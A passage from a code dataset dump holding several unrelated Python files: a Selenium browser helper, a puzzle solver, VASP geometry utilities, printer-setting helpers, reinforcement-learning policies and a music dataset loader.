os.environ.get('PA_SELENUM_URL', None)\n\n if selenum_url != None:\n o = webdriver.ChromeOptions()\n o.add_argument(\"disable-dev-shm-usage\")\n o.add_argument(\"--no-sandbox\")\n o.add_argument('--disable-gpu')\n o.add_argument('--disable-setuid-sandbox')\n\n d = webdriver.Remote(selenum_url, DesiredCapabilities.CHROME, options=o)\n else:\n headless = os.environ.get('PA_HEADLESS', 'no')\n if headless == 'no':\n opts.headless = False\n else:\n opts.headless = True\n opts.binary_location = shutil.which('firefox')\n d = webdriver.Firefox(options=opts, log_path='test.log')\n \n d.set_window_size(1600,900)\n return d","repo_name":"CarlosRuizAscacibar/personal_automation","sub_path":"util/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74809988730","text":"\n# Classic 5x5 A1\n# columnCounts = [2, 0, 1, 1, 1]\n# numberOfColumns = len(columnCounts)\n# rowCounts = [1, 1, 0, 2, 1]\n# numberOfRows = len(rowCounts)\n# grid = [\n# list(\"XXXXX\"),\n# list(\"XTXTX\"),\n# list(\"XXXXX\"),\n# list(\"TTXXX\"),\n# list(\"XXXXT\")\n# ]\n\n# Classic 10x10 A1\n# columnCounts = [4,1,2,1,3,1,3,0,2,3]\n# numberOfColumns = len(columnCounts)\n# rowCounts = [3,0,2,2,0,5,0,4,0,4]\n# numberOfRows = len(rowCounts)\n# grid = [\n# list(\"XTXXXXXXTX\"),\n# list(\"TXXXXTXXXX\"),\n# list(\"XXXXXXXXTX\"),\n# list(\"XTTXXXXXXX\"),\n# list(\"XXXXXXXXXX\"),\n# list(\"XTXXXTXXXX\"),\n# list(\"TTXXTXTXXT\"),\n# list(\"XXXXXTXXXX\"),\n# list(\"TXXXXXXXTX\"),\n# list(\"XXXTXXXTXT\")\n# ]\n\n# Large 20x20 A1\ncolumnCounts = [5,4,3,4,4,3,6,1,6,2,4,3,5,4,4,2,7,2,5,4]\nnumberOfColumns = len(columnCounts)\nrowCounts = [6,2,6,1,8,0,8,1,9,0,7,1,7,1,3,3,4,3,5,3]\nnumberOfRows = len(rowCounts)\ngrid = [\n list(\"XTTXXXXXXXXXXXXXXTTX\"),\n list(\"XXXXXXTXXXXTXTXXXXTX\"),\n list(\"XXXXXXXXTXXXXTXXXTXX\"),\n list(\"XTXXXXTXXXXXTXTXTXTX\"),\n list(\"XTXXTXXTXTXTXXXTXXXX\"),\n 
list(\"XXXXXXXXXXXXXXXXXTXX\"),\n list(\"XTXXXXXXTXXXXTTXXXXX\"),\n list(\"XXTXTXTXTXTXXXTXTXXT\"),\n list(\"TXXTXXXXXXXXXTXXXTXX\"),\n list(\"XXXXXXTXTXXXXXXXXXXX\"),\n list(\"XXXXXXTXXXXXXTXXXXXX\"),\n list(\"TTTXXXXXXXXTTXXXTXXX\"),\n list(\"XXXTXXXXXXTXXXTXXXXT\"),\n list(\"XXXXXXXTXXXXXXXXTTXX\"),\n list(\"XXXXXXXTXXXXXTXTXXXX\"),\n list(\"XXTXXXXXXXTXXXXXXXXX\"),\n list(\"XTXTXXXXXXXXXTXXXXXT\"),\n list(\"XXXXXTXXTXXTXXXXXXXX\"),\n list(\"TXXXXTXXXXTXXXTXXXTX\"),\n list(\"XXTXTXXXTXXXXXXXXTXX\")\n]\n\n\"\"\"\nThe solver is stuck on this 20x20 puzzle. Either there is a bug, or I need to implement more logic into the solver, because currently \nit is being too generous with placing grass. \nI am not entirely sure why this is, because it appears to me that the logic in place should not be allowing such placement, \nbut nonetheless, here we are. :P\n\n\"\"\"\n\ndef printGrid(pause=False):\n for r in range(numberOfRows):\n print(' '.join(grid[r]))\n print()\n if pause: input()\n# printGrid()\n\ndef getCellNeighbours(row, col, onlyAdjacent=False):\n neighbours = [\n [row-1, col-1],\n [row-1, col],\n [row-1, col+1],\n [row, col+1],\n [row+1, col+1],\n [row+1, col],\n [row+1, col-1],\n [row, col-1]\n ]\n\n if onlyAdjacent:\n neighbours = [\n neighbours[1],\n neighbours[3],\n neighbours[5],\n neighbours[7]\n ]\n return neighbours\n\n # print(neighbours)\n \n return neighbours\n \n\ndef setTent(r_, c_):\n \n try:\n grid[r_][c_] = 'A'\n except: \n raise Exception(f\"r:{r_}, c:{c_}\")\n \n # For each placed Tent, set the surrounding 8 cells as Grass:\n neighbours = getCellNeighbours(r_, c_)\n for nR, nC in neighbours:\n if (nR == -1) or (nC == -1) or (nR == numberOfRows) or (nC == numberOfColumns): continue\n if grid[nR][nC] == 'X': grid[nR][nC] = 'G'\n\n\n\n# Can I place a tent here?\ndef validTentPosition(checkRow, checkCol):\n # Needs to be an empty space:\n if grid[checkRow][checkCol] != 'X': return False\n\n currentNeighbours = getCellNeighbours(checkRow, checkCol, True)\n\n adjacentTreeCount = 0\n adjacentTentCount = 0\n for nR, nC in currentNeighbours:\n if (nR==-1) or (nC==-1) or (nR==numberOfRows) or (nC==numberOfColumns): continue\n adjacentTreeCount += int(grid[nR][nC] == 'T')\n adjacentTentCount += int(grid[nR][nC] == 'A')\n \n # Needs to be an adjacent tree:\n if adjacentTreeCount == 0: return False\n \n # Needs to be no adjacent tents: \n if adjacentTentCount > 0: return False\n\n # Needs to be available space to fit into row/col count.\n row = grid[checkRow]\n col = [grid[r][checkCol] for r in range(numberOfRows)]\n if (row.count('A') == rowCounts[checkRow]) or (col.count('A') == columnCounts[checkCol]): return False\n\n return True\n\ndef tentCountMet_FillGrass():\n for r in range(numberOfRows):\n if grid[r].count('A') == rowCounts[r]:\n grid[r] = ['G' if val=='X' else val for val in grid[r]]\n \n for c in range(numberOfColumns):\n col = [grid[r][c] for r in range(numberOfRows)]\n if col.count('A') == columnCounts[c]:\n for r in range(numberOfRows):\n if grid[r][c] == 'X': grid[r][c] = 'G'\n\n\n# for r in range(numberOfRows):\n# for c in range(numberOfColumns):\n# if validTentPosition(r, c): continue\n# if grid[r][c] != 'X': continue\n\n# grid[r][c] = 'G'\n\ndef tentCountEquals_RemainingSpaces():\n for r in range(numberOfRows):\n if grid[r].count('X') + grid[r].count('A') == rowCounts[r]:\n grid[r] = ['A' if val=='X' else val for val in grid[r]]\n \n for c in range(numberOfColumns):\n col = [grid[r][c] for r in range(numberOfRows)]\n if col.count('X') + col.count('A') == 
columnCounts[c]:\n for r in range(numberOfRows):\n if grid[r][c] == 'X' and validTentPosition(r, c): \n setTent(r, c)\n\n\ndef treeHasOneTentPosition():\n for r in range(numberOfRows):\n for c in range(numberOfColumns):\n if grid[r][c] != 'T': continue\n\n treeAdjacentNeighbours = getCellNeighbours(r, c, True)\n neighbourValues = []\n for nR, nC in treeAdjacentNeighbours:\n if (nR == -1) or (nC == -1) or (nR == numberOfRows) or (nC == numberOfColumns):\n neighbourValues.append('O') # Just using a different letter as a placeholder in the list, so that indexing works in the future\n else:\n neighbourValues.append(grid[nR][nC])\n \n # print(f\"R:{r}, C:{c}\")\n # print(neighbourValues)\n\n if neighbourValues.count('A') == 0 and neighbourValues.count('X') == 1:\n tR, tC = treeAdjacentNeighbours[neighbourValues.index('X')]\n if validTentPosition(tR, tC):\n setTent(tR, tC)\n\ndef canOnlyBeGrass():\n for r in range(numberOfRows):\n for c in range(numberOfColumns):\n if grid[r][c] != 'X': continue\n\n adjacentNeighbours = getCellNeighbours(r, c, True)\n treeAdjacent = False\n for nR, nC in adjacentNeighbours:\n if (nR==-1) or (nR==numberOfRows) or (nC==-1) or (nC==numberOfColumns): continue\n if grid[nR][nC] == 'T': \n treeAdjacent = True\n break\n \n if treeAdjacent == False:\n grid[r][c] = 'G'\n\ndef gridComplete():\n numberOfTents = sum([grid[r].count('A') for r in range(numberOfRows)])\n return numberOfTents == sum(rowCounts)\n \n # for r in range(numberOfRows):\n # if grid[r].count('A') != rowCounts[r]: return False\n \n # return True\n\n\n# while not gridComplete():\nfor _ in range(numberOfColumns * numberOfRows * 10):\n canOnlyBeGrass()\n tentCountMet_FillGrass()\n tentCountEquals_RemainingSpaces()\n treeHasOneTentPosition()\n\n# for r in range(numberOfRows):\n# for c in range(numberOfColumns):\n# if grid[r][c] == 'X': grid[r][c] = 'G'\n\n\nprintGrid()\n\n\n","repo_name":"Dowzer721/vsCode-Sync","sub_path":"Tents&Trees/solver_v1.1.py","file_name":"solver_v1.1.py","file_ext":"py","file_size_in_byte":7216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37291348371","text":"from os.path import join, abspath, dirname, pardir\n\n# Logging format\n#LOG_FORMAT = \"%(asctime)s %(name)-12s %(levelname)-8s %(message)s\"\nLOG_FORMAT = \"%(message)s\"\n\nBASE_DIR = abspath(dirname(__file__))\nCONFIG_FILE = BASE_DIR+\"/options/config.ini\"\n\n# Characters\nCSV_SEP = ';'\nTRACE_SEP = '\\t'\nNL = '\\n' # new line\n\n# Directions\nIN = -1\nOUT = 1\nDIR_NAMES = {IN: \"incoming\", OUT: \"outgoing\"}\nDIRECTIONS = [OUT, IN]\n\n# AP states\nGAP = 0x00\nBURST = 0x01\nWAIT = 0x02\nDICT_STATES = {GAP: \"gap\", BURST: \"burst\", WAIT: \"wait\"}\n\n# Mappings\nDIRS2EP = {OUT: 'client', IN: 'server'}\nEP2DIRS = {'client': OUT, 'server': IN}\nMODE2STATE = {'gap': GAP, 'burst': BURST}\n\n# Histograms\nINF = float(\"inf\")\nNO_SEND_HISTO = -1\n\n# logging levels\nNONE = 7\nINFO = 6\nDEBUG = 5\nVDEBUG = 4\nALL = 3\nDICT_LOGS = {\"NONE\": NONE, \"INFO\": INFO, \"DEBUG\": DEBUG, \"VDEBUG\": VDEBUG, \"ALL\": ALL}\nDICT_LOGS_RVS = {NONE: \"NONE\", INFO: \"INFO\", DEBUG: \"DEBUG\", VDEBUG: \"VDEBUG\", ALL: \"ALL\"}","repo_name":"sebhenri/HyWF","sub_path":"HyWF_code/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"29931901049","text":"import numpy\n\nfrom typing import List, TextIO, Dict\n\n\ndef get_zvals(f: TextIO) -> 
Dict[str, float]:\n \"\"\"Extract the number of valence electron in a POTCAR file\n \"\"\"\n lines = f.readlines()\n zvals = {}\n\n current_element = None\n for line in lines:\n if 'VRHFIN' in line:\n current_element = line[line.find('=') + 1:line.find(':')]\n if 'ZVAL' in line:\n start = line.find('ZVAL')\n start = line.find('=', start)\n value = float(line[start + 1:start + 8])\n\n zvals[current_element] = value\n\n return zvals\n\n\nclass Geometry:\n def __init__(\n self,\n title: str,\n lattice_vectors: numpy.ndarray,\n ion_types: List[str],\n ion_numbers: List[int],\n positions: numpy.ndarray,\n is_direct: bool = True,\n selective_dynamics: numpy.array = None\n ):\n self.title = title\n self.lattice_vectors = lattice_vectors\n self.ion_types = ion_types\n self.ion_numbers = ion_numbers\n self.selective_dynamics = selective_dynamics\n\n self.ions = []\n for ion_type, ion_number in zip(ion_types, ion_numbers):\n self.ions.extend([ion_type] * ion_number)\n\n self._cartesian_coordinates = None\n self._direct_coordinates = None\n\n if is_direct:\n self._direct_coordinates = positions.copy()\n self._cartesian_coordinates = numpy.einsum('ij,jk->ik', positions, self.lattice_vectors)\n else:\n self._cartesian_coordinates = positions.copy()\n self._direct_coordinates = numpy.einsum('ij,jk->ik', positions, numpy.linalg.inv(self.lattice_vectors))\n\n def __len__(self):\n return sum(self.ion_numbers)\n\n def __str__(self) -> str:\n return self.as_poscar()\n\n def as_poscar(self, direct: bool = True) -> str:\n \"\"\"Get a representation as in a POSCAR, using direct coordinates or not.\n \"\"\"\n\n r = '{}\\n1.0\\n'.format(self.title)\n r += '\\n'.join('{: 16.12f} {: 16.12f} {: 16.12f}'.format(*self.lattice_vectors[i]) for i in range(3))\n r += '\\n{}\\n{}\\n'.format(' '.join(self.ion_types), ' '.join(str(x) for x in self.ion_numbers))\n\n if self.selective_dynamics is not None:\n r += 'Selective dynamics\\n'\n\n if direct:\n r += 'Direct\\n'\n p = self._direct_coordinates\n else:\n r += 'Carthesian\\n'\n p = self._cartesian_coordinates\n\n for i in range(len(self)):\n r += '{: 16.12f} {: 16.12f} {: 16.12f}'.format(*p[i])\n if self.selective_dynamics is not None:\n r += ' {} {} {}'.format(*('T' if x else 'F' for x in self.selective_dynamics[i]))\n\n r += ' {}\\n'.format(self.ions[i])\n\n return r\n\n def to_poscar(self, f: TextIO, direct: bool = True):\n \"\"\"Write a POSCAR in `f`\n \"\"\"\n f.write(self.as_poscar(direct=direct))\n\n @classmethod\n def from_poscar(cls, f: TextIO):\n title = f.readline().strip()\n\n # get lattice vectors\n scaling = float(f.readline())\n lattice_vectors = scaling * numpy.array([[float(x) for x in f.readline().split()] for _ in range(3)])\n\n ion_types = f.readline().split()\n ion_numbers = [int(x) for x in f.readline().split()]\n\n line = f.readline().strip()[0].lower()\n is_selective_dynamics = line == 's'\n\n if is_selective_dynamics:\n is_direct = f.readline().strip()[0].lower() == 'd'\n else:\n is_direct = line == 'd'\n\n # get geometry\n geometry = []\n selective_dynamics = []\n line = f.readline()\n for i in range(sum(ion_numbers)):\n chunks = line.split()\n geometry.append([float(x) for x in chunks[:3]])\n if is_selective_dynamics:\n selective_dynamics.append([x == 'T' for x in chunks[3:6]])\n\n line = f.readline()\n\n positions = numpy.array(geometry)\n selective_dynamics_arr = None\n if is_selective_dynamics:\n selective_dynamics_arr = numpy.array(selective_dynamics, dtype=bool)\n\n return cls(\n title,\n lattice_vectors,\n ion_types,\n ion_numbers,\n 
positions,\n is_direct=is_direct,\n selective_dynamics=selective_dynamics_arr\n )\n\n def cartesian_coordinates(self) -> numpy.ndarray:\n \"\"\"Convert to cartesian coordinates if any\n \"\"\"\n\n return self._cartesian_coordinates\n\n def direct_coordinates(self) -> numpy.ndarray:\n \"\"\"Convert to cartesian coordinates if any\n \"\"\"\n\n return self._direct_coordinates\n\n def interslab_distance(self) -> float:\n \"\"\"Assume that the geometry is a slab and compute the interslab distance\n \"\"\"\n\n z_coo = self.cartesian_coordinates()[:, 2]\n return z_coo.min() - z_coo.max() + self.lattice_vectors[2, 2]\n\n def slab_thickness(self) -> float:\n \"\"\"Assume that the geometry is a slab (along z) and compute the thickness of said slab\n \"\"\"\n\n z_coo = self.cartesian_coordinates()[:, 2]\n return z_coo.max() - z_coo.min()\n\n def change_interslab_distance(self, d: float, direct: bool = True) -> 'Geometry':\n \"\"\"Assume that the geometry is a slab (along z) and change interslab distance (c axis).\n \"\"\"\n\n z_positions = self.cartesian_coordinates()[:, 2]\n\n # set at zero:\n z_positions -= numpy.min(z_positions)\n\n # get slab size\n slab_size = numpy.max(z_positions)\n\n # get corresponding lattice_vector\n z_lattice_norm = slab_size + d\n\n # re-center slab\n z_positions += d / 2\n\n # create a new geometry\n if direct:\n p = self._direct_coordinates.copy()\n p[:, 2] = z_positions / z_lattice_norm\n else:\n p = self._cartesian_coordinates.copy()\n p[:, 2] = z_positions\n\n new_lattice_vectors = self.lattice_vectors.copy()\n new_lattice_vectors[2] = [.0, .0, z_lattice_norm]\n\n return Geometry(\n self.title,\n new_lattice_vectors,\n self.ion_types,\n self.ion_numbers,\n p,\n is_direct=direct,\n selective_dynamics=self.selective_dynamics\n )\n\n def nelect(self, f: TextIO) -> float:\n \"\"\"Read out the number of valence electrons from a POTCAR (`f`)\n and compute the corresponding number of electrons in the system.\n \"\"\"\n zvals = get_zvals(f)\n nelect = 0\n for n, symbol in zip(self.ion_numbers, self.ion_types):\n nelect += n * zvals[symbol]\n\n return nelect\n","repo_name":"pierre-24/ec-interface","sub_path":"ec_interface/vasp_geometry.py","file_name":"vasp_geometry.py","file_ext":"py","file_size_in_byte":6710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7661912838","text":"# Im a comment (use ctrl + / for comments)\r\n\r\n# Variables\r\nname = \"Sebastian\" # String\r\nlast = \"Ruiz\" # String\r\nage = 22 # Int\r\nfound = False # Bool\r\nprice = 9.99 # Float\r\n\r\n# Print\r\nprint(\"Name: \" + name + \"\\nLast Name: \" + last + str(age))\r\n# OR\r\nprint(\"Name: {name} Last Name: {last} Age: {age}\")\r\n\r\n# IF statements\r\nif age >= 18:\r\n print(name + \" \" + \" Is a grownup!\")\r\nelif age == 100:\r\n print(name + \" \" + \"Is a century old!\")\r\nelse:\r\n print(name + \" \" + \"Is Underage\")\r\n\r\n# Inputs\r\nfound = input(\"Enter\" + name + \" \" + last + \" \" + \"age: \")","repo_name":"SebastianRuiz18/FSDI","sub_path":"108/intro/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13779338796","text":"\"\"\"\nNPA Commands\n------------\n\"\"\"\n\nimport os\nimport logging\nfrom lxk_testlib import rob\n\nROOT_DIR = os.path.dirname(os.path.realpath(__file__))\nFOLDER_PATH = os.path.join(ROOT_DIR, \"constants\", \"_files\")\nLOGGER = 
logging.getLogger(__name__)\nLOGGER.setLevel(logging.DEBUG)\n\ndef set_value(ip_address, npaid, value):\n \"\"\"\n Set value of the setting of the printer through NPA.\n\n :Parameters:\n\n 1. ip_address, ````\n 2. npaid, ````, Hex NPA Id or npaid string from npaids.enum,\n Int NPA Id or setting name from bundles.xml.\n 3. value, ```` or ````\n\n :Returns: Success ````\n \"\"\"\n LOGGER.debug(ip_address)\n LOGGER.debug(npaid)\n LOGGER.debug(value)\n\n npa_enum_path = os.path.join(FOLDER_PATH, \"npa\", \"npaids.enum\")\n if not os.path.exists(npa_enum_path):\n assert False, \"Could not find \" + npa_enum_path + \"!!!\"\n\n if len(npaid) > 4:\n file = open(npa_enum_path, \"r\")\n lines = file.readlines()\n ret = []\n for x in lines:\n if npaid in x:\n ret = x.replace(\" \",\"\").split('=')\n LOGGER.debug(ret)\n break\n if len(ret) == 2:\n npaid = ret[1].upper().lstrip().rstrip()\n setting = 'ss'\n if value.isdigit():\n if npaid.isdigit():\n setting = 'ii'\n else:\n setting = 'si'\n\n cmd = \"\"\"call system.settings setSetting \"({\"\"\" + setting + \"\"\"})\" setting \"\"\"\\\n + npaid + \"\"\" value \\\"\"\"\" + value + \"\"\"\\\"\"\"\"\n LOGGER.debug(cmd)\n return_output = rob.execute(ip_address, cmd)\n LOGGER.debug(return_output)\n if not return_output[0] or \"success\" not in return_output[1]:\n assert False, \"Unable to set NPAID. {}\".format(return_output[1])\n else:\n return return_output[0]\n\ndef get_value(ip_address, npaid, index_num=None, use_enum_path=True):\n \"\"\"\n Get settings value of the printer using NPA ID.\n\n :Parameters:\n\n 1. ip_address, ````\n 2. npaid, ````, Hex NPA Id or npaid string from npaids.enum.\n\n :Returns: ```` or ````\n \"\"\"\n LOGGER.debug(ip_address)\n LOGGER.debug(npaid)\n LOGGER.debug(index_num)\n\n npa_enum_path = os.path.join(FOLDER_PATH, \"npa\", \"npaids.enum\")\n if not os.path.exists(npa_enum_path):\n assert False, \"Could not find \" + npa_enum_path + \"!!!\"\n\n if len(npaid) > 4 and use_enum_path == True:\n file = open(npa_enum_path, \"r\")\n lines = file.readlines()\n ret = []\n for x in lines:\n if npaid in x:\n ret = x.replace(\" \",\"\").split('=')\n LOGGER.debug(ret)\n break\n if len(ret) == 2:\n npaid = ret[1].upper().lstrip().rstrip()\n\n if index_num:\n index_num = int(index_num) - 1\n if isinstance(npaid, int):\n cmd = \"\"\"call system.settings getIndexedSetting \"(ii)\" \"\"\" + npaid + \" \" + str(index_num)\n else:\n cmd = \"\"\"call system.settings getIndexedSetting \"(si)\" \"\"\" + npaid + \" \" + str(index_num)\n else:\n if isinstance(npaid, int):\n cmd = \"\"\"call system.settings getSetting \"(i)\" \"\"\" + npaid\n else:\n cmd = \"\"\"call system.settings getSetting \"(s)\" \"\"\" + npaid\n LOGGER.debug(cmd)\n returnoutput = rob.execute(ip_address, cmd)\n LOGGER.debug(returnoutput)\n value = \"\"\n if \"status : :i 0\" in returnoutput[1]:\n for ret in returnoutput[1].split(\"\\n\"):\n if \"value : :\" in ret.strip():\n LOGGER.debug(ret)\n if ret.strip() == 'value : :':\n value = ''\n elif 'value : :i' in ret.rstrip():\n value = ret.rstrip().replace('value : :i ', '')\n elif 'value : :bi' in ret.rstrip():\n value = ret.rstrip().replace('value : :bi', '')\n elif 'value : :b' in ret.rstrip():\n value = ret.rstrip().replace('value : :b ', '')\n elif 'value : : bi' in ret.rstrip():\n value = ret.rstrip().replace('value : : bi ', '')\n elif 'value : :' in ret.rstrip():\n value = ret.rstrip().replace('value : : ', '')\n\n LOGGER.debug(value)\n if not returnoutput[0]:\n assert False, \"Unable to get NPAID value. 
{}\".format(returnoutput[1])\n else:\n return value.strip()\n","repo_name":"TrellixVulnTeam/CloudAutomation_KDSZ","sub_path":"venv/Lib/site-packages/lxk_testlib/npa.py","file_name":"npa.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9071077526","text":"from __future__ import absolute_import, print_function\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom rltools import nn, tfutil\nfrom rltools.distributions import Categorical, RecurrentCategorical\nfrom rltools.policy.stochastic import StochasticPolicy\nfrom rltools.util import EzPickle\n\n\nclass CategoricalMLPPolicy(StochasticPolicy, EzPickle):\n\n def __init__(self, observation_space, action_space, hidden_spec, enable_obsnorm, varscope_name):\n EzPickle.__init__(self, observation_space, action_space, hidden_spec, enable_obsnorm,\n varscope_name)\n self.hidden_spec = hidden_spec\n self._dist = Categorical(action_space.n)\n super(CategoricalMLPPolicy, self).__init__(observation_space, action_space, action_space.n,\n enable_obsnorm, varscope_name)\n\n @property\n def distribution(self):\n return self._dist\n\n def _make_actiondist_ops(self, obsfeat_B_Df):\n with tf.variable_scope('hidden'):\n net = nn.FeedforwardNet(obsfeat_B_Df, self.observation_space.shape, self.hidden_spec)\n with tf.variable_scope('out'):\n out_layer = nn.AffineLayer(net.output, net.output_shape, (self.action_space.n,),\n Winitializer=tf.zeros_initializer,\n binitializer=None) # TODO action_space\n\n scores_B_Pa = out_layer.output\n actiondist_B_Pa = scores_B_Pa - tfutil.logsumexp(scores_B_Pa, axis=1)\n\n return actiondist_B_Pa\n\n def _make_actiondist_logprobs_ops(self, actiondist_B_Pa, input_actions_B_Da):\n return self.distribution.log_density_expr(actiondist_B_Pa, input_actions_B_Da[:, 0])\n\n def _make_actiondist_kl_ops(self, proposal_actiondist_B_Pa, actiondist_B_Pa):\n return self.distribution.kl_expr(proposal_actiondist_B_Pa, actiondist_B_Pa)\n\n def _sample_from_actiondist(self, actiondist_B_Pa, deterministic=False):\n probs_B_A = np.exp(actiondist_B_Pa)\n assert probs_B_A.shape[1] == self.action_space.n\n if deterministic:\n return np.argmax(probs_B_A, axis=1)[:, None]\n return self.distribution.sample(probs_B_A)[:, None]\n\n def _compute_actiondist_entropy(self, actiondist_B_Pa):\n return self.distribution.entropy(np.exp(actiondist_B_Pa))\n\n\nclass CategoricalGRUPolicy(StochasticPolicy):\n\n def __init__(self, observation_space, action_space, hidden_spec, enable_obsnorm, varscope_name,\n state_include_action=True):\n self.hidden_spec = hidden_spec\n self.state_include_action = state_include_action\n self._dist = RecurrentCategorical(action_space.n)\n self.prev_actions = None\n self.prev_hiddens = None\n\n super(CategoricalGRUPolicy, self).__init__(observation_space, action_space, action_space.n,\n enable_obsnorm, varscope_name)\n\n @property\n def recurrent(self):\n return True\n\n @property\n def distribution(self):\n return self._dist\n\n def _make_actiondist_ops(self, obs_B_H_Df):\n B = tf.shape(obs_B_H_Df)[0]\n H = tf.shape(obs_B_H_Df)[1]\n flatobs_B_H_Df = tf.reshape(obs_B_H_Df, tf.pack([B, H, -1]))\n if self.state_include_action:\n net_in = tf.concat(2, [flatobs_B_H_Df, self._prev_actions_B_H_Da])\n net_shape = (np.prod(self.observation_space.shape) + self.action_space.n,)\n else:\n net_in = flatobs_B_H_Df\n net_shape = (np.prod(self.observation_space.shape),)\n with tf.variable_scope('net'):\n net = nn.GRUNet(net_in, net_shape, 
self.action_space.n, self.hidden_spec)\n\n # XXX\n self.hidden_dim = net._hidden_dim\n\n scores_B_H_Pa = net.output\n actiondist_B_H_Pa = scores_B_H_Pa - tfutil.logsumexp(scores_B_H_Pa, axis=2)\n\n compute_step_prob = tfutil.function([net.step_input, net.step_prev_hidden],\n [net.step_output, net.step_hidden])\n return actiondist_B_H_Pa, net.step_input, compute_step_prob, net.hid_init\n\n def reset(self, dones=None):\n if dones is None:\n dones = [True]\n\n dones = np.asarray(dones)\n if self.prev_actions is None or len(dones) != len(self.prev_actions):\n self.prev_actions = np.zeros((len(dones), self.action_space.n))\n self.prev_hiddens = np.zeros((len(dones), self.hidden_dim))\n\n self.prev_actions[dones] = 0.\n self.prev_hiddens[dones] = self._hidden_vec.eval()\n\n def _make_actiondist_logprobs_ops(self, actiondist_B_H_Pa, input_actions_B_H_Da):\n return self.distribution.log_density_expr(actiondist_B_H_Pa, input_actions_B_H_Da[:, :, 0])\n\n def _make_actiondist_kl_ops(self, proposal_actiondist_B_Pa, actiondist_B_Pa):\n return self.distribution.kl_expr(proposal_actiondist_B_Pa, actiondist_B_Pa)\n\n def _compute_actiondist_entropy(self, actiondist_B_Pa):\n return self.distribution.entropy(np.exp(actiondist_B_Pa))\n\n def _sample_from_actiondist(self, actiondist_B_Pa, deterministic=False):\n probs_B_A = np.exp(actiondist_B_Pa)\n # XXX\n probs_B_A = probs_B_A / probs_B_A.sum(axis=1)[:, None]\n # XXX\n assert probs_B_A.shape[1] == self.action_space.n\n if deterministic:\n return np.argmax(probs_B_A, axis=1)[:, None]\n return self.distribution.sample(probs_B_A)[:, None]\n\n def sample_actions(self, obs_B_Df, deterministic=False):\n B = obs_B_Df.shape[0]\n flat_obs_B_Df = obs_B_Df.reshape((B, -1))\n if self.state_include_action:\n assert self.prev_actions is not None\n net_in_B_Do = np.concatenate([flat_obs_B_Df, self.prev_actions], axis=-1)\n else:\n net_in_B_Do = flat_obs_B_Df\n\n actiondist_B_Pa, hidden_vec = self.compute_step_actiondist(net_in_B_Do, self.prev_hiddens)\n actions_B_Da = self._sample_from_actiondist(actiondist_B_Pa, deterministic)\n prev_actions = self.prev_actions\n self.prev_actions = actions_B_Da\n self.prev_hiddens = hidden_vec\n\n return actions_B_Da, actiondist_B_Pa\n","repo_name":"sisl/rltools","sub_path":"rltools/policy/categorical.py","file_name":"categorical.py","file_ext":"py","file_size_in_byte":6184,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"22108073842","text":"import tarfile\nimport pandas as pd\n\nfrom .base import get_data, get_data_dir, get_quantized_data_path\n\nfrom ..preprocess import quantize_mfccs\n\nCAL500_DIR = 'cal500'\nCAL500_TAR = 'CAL500_DeltaMFCCFeatures.tar.gz'\nURL = ('http://calab1.ucsd.edu/~datasets/cal500/cal500data/'\n 'CAL500_DeltaMFCCFeatures.tar.gz')\n\n\ndef fetch_cal500(data_home=None, download_if_missing=True, codebook_size=512):\n r\"\"\"Loader for the CAL500 dataset [1]_.\n\n This dataset consists of 502 western pop songs, performed by 499 unique\n artists. Each song is tagged by at least three people using a standard\n survey and a fixed tag vocabulary of 174 *musical concepts*.\n\n .. warning::\n\n This utility downloads a ~1GB file to your home directory. This might\n take a few minutes, depending on your bandwidth.\n\n Parameters\n ----------\n data_home : optional\n Specify a download and cache folder for the datasets. 
By default\n (``None``) all data is stored in subfolders of ``~/cbar_data``.\n\n download_if_missing: bool, optional\n If ``False``, raise a ``IOError`` if the data is not locally available\n instead of trying to download the data from the source site.\n Defaults to ``True``.\n\n codebook_size : int, optional\n The codebook size. Defaults to 512.\n\n Returns\n -------\n X : pd.DataFrame, shape = [502, codebook_size]\n Each row corresponds to a preprocessed song, represented as a sparse\n codebook vector.\n\n Y : pd.DataFrame, shape = [502, 174]\n Tags associated with each song in binary indicator format.\n\n Notes\n ------\n\n The CAL500 dataset is downloaded from UCSD's `Computer Audition\n Laboratory's datasets page `_.\n\n The raw dataset consists of about 10,000 39-dimensional features vectors\n per minute of audio content. The feature vectors were created by:\n\n 1.\n Sliding a half-overlapping short-time window of 12 milliseconds over\n each song's waveform data.\n 2.\n Extracting the 13 mel-frequency cepstral coefficients.\n 3.\n Appending the instantaneous first-order and second-order derivatives.\n\n Each song is represented by exactly 10,000 randomly subsampled,\n real-valued feature vectors as a *bag-of-frames*\n :math:`\\mathcal{X} = \\{\\vec{x}_1, \\ldots, \\vec{x}_T\\} \\in\n \\mathbb{R}^{d \\times T}`, where :math:`d = 39` and :math:`T = 10000`.\n\n The *bag-of-frames* features for each song are further preprocessed into\n one *k*-dimensional feature vector with the following procedure:\n\n 1.\n **Encode feature vectors as code vectors.**\n Each feature vector :math:`\\vec{x}_t \\in \\mathbb{R}^d` is encoded as a\n code vector :math:`\\vec{c}_t \\in \\mathbb{R}^k` according to a\n pre-defined codebook :math:`C \\in \\mathbb{R}^{d \\times k}`. The\n intermediate representation for the encoded audio file is\n :math:`\\mathcal{X}_{enc} \\in \\mathbb{R}^{k \\times T}`.\n 2.\n **Pool code vectors into one compact vector.**\n The encoded frame vectors are pooled together into a single compact\n vector. An audio file :math:`x` can now be represented as a single\n *k*-dimensional vector :math:`\\vec{x} \\in \\mathbb{R}^k`.\n\n Specifically, the k-means clustering algorithm is used to cluster all\n audio files' frames into ``codebook_size`` clusters in step 1. The\n resulting cluster centers correspond to the codewords in the codebook.\n Accordingly, the encoding step consists of assigning each frame vector\n to its closest cluster center.\n\n References\n ----------\n\n .. [1] D. 